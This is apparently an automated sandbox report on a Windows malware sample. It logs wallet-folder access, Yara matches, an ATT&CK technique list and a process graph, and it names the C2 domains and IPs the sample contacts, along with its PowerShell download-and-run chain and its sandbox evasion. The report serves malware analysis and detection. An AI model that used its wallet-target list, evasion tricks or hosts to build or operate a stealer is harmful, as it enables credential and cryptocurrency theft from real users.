                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_81
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_XP
                                Source: QkRFz2sau5.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_XPe
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_VISTA
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_7
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_8
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: Yara matchFile source: 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.22377011303.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a320000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.f891ed3167.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.f8e8a2d2f0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a370000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.0.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a2ba000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.2.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.f891ed3167.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.f8e8a2d2f0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a320000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.33c3d7c7bd.exe.a2ba000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.9c1024a1f1.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000023.00000002.22885525568.000000000A2BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.22706302291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.22744830820.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.23299926904.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.22450863752.0000000000FC1000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.22885525568.000000000A370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.22885525568.000000000A320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 42.2.f8e8a2d2f0.exe.4289550.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.f891ed3167.exe.3d99550.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 48.2.MSBuild.exe.4078630.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 48.2.MSBuild.exe.69b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 48.2.MSBuild.exe.69b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.f8e8a2d2f0.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.f891ed3167.exe.3d99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 48.2.MSBuild.exe.4078630.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.0.f891ed3167.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.23317961529.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.23336208269.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe, type: DROPPED
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009E1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket | 0_2_009E1204
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009E1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_009E1806
MITRE ATT&CK Matrix

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Techniques flagged for this sample, with the count shown beside each cell in the matrix (techniques that appear in several tactic columns are listed once): Scripting (21), Valid Accounts (2), Windows Management Instrumentation (121), Exploitation for Privilege Escalation (1), Disable or Modify Tools (11), OS Credential Dumping (2), System Time Discovery (2), Archive Collected Data (11), Ingress Tool Transfer (14), System Shutdown/Reboot (1), Native API (1), DLL Side-Loading (1), Deobfuscate/Decode Files or Information (11), Input Capture (21), Account Discovery (1), Data from Local System (41), Encrypted Channel (11), Command and Scripting Interpreter (2), Obfuscated Files or Information (131), File and Directory Discovery (13), Email Collection (1), Non-Standard Port (1), Scheduled Task/Job (21), Access Token Manipulation (21), Software Packing (22), System Information Discovery (410), Non-Application Layer Protocol (4), PowerShell (2), Process Injection (212), Timestomp (1), Security Software Discovery (1191), Clipboard Data (3), Application Layer Protocol (125), Virtualization/Sandbox Evasion (681), Masquerading (111), Process Discovery (4), Application Window Discovery (11), Modify Registry (1), System Owner/User Discovery (1), System Network Configuration Discovery (1), Mshta (1).

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                Behavior Graph ID: 1611846 | Sample: QkRFz2sau5.exe | Start date: 11/02/2025 | Architecture: WINDOWS | Score: 100

                                Graph nodes are listed below as [node id]; "started" edges list the child process with its own node id, and the number that follows a process name is the graph's count badge for that process.

                                [2] Start
                                • DNS/IP: toppyneedus.biz; suggestyuoz.biz; 21 other IPs or domains
                                • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 35 other signatures
                                • Started: skotes.exe 57 [11]; QkRFz2sau5.exe 1 [16]; skotes.exe [18]; 2 other processes [20]

                                [11] skotes.exe
                                • DNS/IP: 185.215.113.43, 49756, 49757, 49760 WHOLESALECONNECTIONSNL Portugal; 185.215.113.75, 49758, 49762, 49767 WHOLESALECONNECTIONSNL Portugal
                                • Dropped: C:\Users\user\AppData\...\c7f37422c5.exe, PE32; C:\Users\user\AppData\...\d9caf9fc21.exe, PE32; C:\Users\user\AppData\...\f8e8a2d2f0.exe, PE32; 13 other malicious files
                                • Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                • Started: 9c1024a1f1.exe [22]; 7ecb69d7f1.exe [26]; f8e8a2d2f0.exe [28]; 5 other processes [38]

                                [16] QkRFz2sau5.exe
                                • Dropped: C:\Users\user\AppData\Local\...\CB6Ixkrbm.hta, HTML
                                • Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Creates HTA files
                                • Started: mshta.exe 19 [30]; cmd.exe 1 [32]

                                [20] 2 other processes
                                • Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                • Started: AchillesGuard.com [34]; powershell.exe 16 [36]

                                [22] 9c1024a1f1.exe
                                • DNS/IP: rebeldettern.com 172.67.150.254, 443, 49759, 49761 CLOUDFLARENETUS United States
                                • Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 4 other signatures

                                [26] 7ecb69d7f1.exe
                                • Signatures: Multi AV Scanner detection for dropped file
                                • Started: cmd.exe [40]

                                [28] f8e8a2d2f0.exe
                                • Signatures: Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                                • Started: f8e8a2d2f0.exe [43]; WerFault.exe [47]

                                [30] mshta.exe
                                • Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                                • Started: powershell.exe 15 19 [49]

                                [32] cmd.exe
                                • Signatures: Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
                                • Started: 2 other processes [57]

                                [34] AchillesGuard.com
                                • Started: MSBuild.exe [51]

                                [36] powershell.exe
                                • Started: conhost.exe [53]

                                [38] 5 other processes
                                • Signatures: Tries to detect sandboxes and other dynamic analysis tools (window names); 2 other signatures
                                • Started: f891ed3167.exe [55]; 2 other processes [59]

                                [40] cmd.exe
                                • Dropped: C:\Users\user\AppData\...\Macromedia.com, PE32
                                • Started: Macromedia.com [61]; conhost.exe [65]; tasklist.exe [67]; 9 other processes [73]

                                [43] f8e8a2d2f0.exe
                                • DNS/IP: paleboreei.biz 172.67.181.243 CLOUDFLARENETUS United States
                                • Signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

                                [49] powershell.exe
                                • DNS/IP: 185.215.113.16, 49755, 80 WHOLESALECONNECTIONSNL Portugal
                                • Dropped: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE, PE32
                                • Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Powershell drops PE file
                                • Started: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE 4 [69]; conhost.exe [71]

                                [55] f891ed3167.exe
                                • DNS/IP: importenptoc.com 104.21.47.135 CLOUDFLARENETUS United States
                                • Signatures: Tries to steal Crypto Currency Wallets

                                [61] Macromedia.com
                                • Dropped: C:\Users\user\AppData\...\AchillesGuard.com, PE32; C:\Users\user\AppData\...\AchillesGuard.js, ASCII
                                • Signatures: Drops PE files with a suspicious file extension; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
                                • Started: MSBuild.exe [75]; schtasks.exe [79]; MSBuild.exe [81]

                                [69] Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE
                                • Dropped: C:\Users\user\AppData\Local\...\skotes.exe, PE32
                                • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 4 other signatures
                                • Started: skotes.exe [83]

                                [75] MSBuild.exe
                                • DNS/IP: 159.100.19.137 DE-FIRSTCOLOwwwfirst-colonetDE Germany
                                • Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

                                [79] schtasks.exe
                                • Started: conhost.exe [85]

                                [83] skotes.exe
                                • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 4 other signatures

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.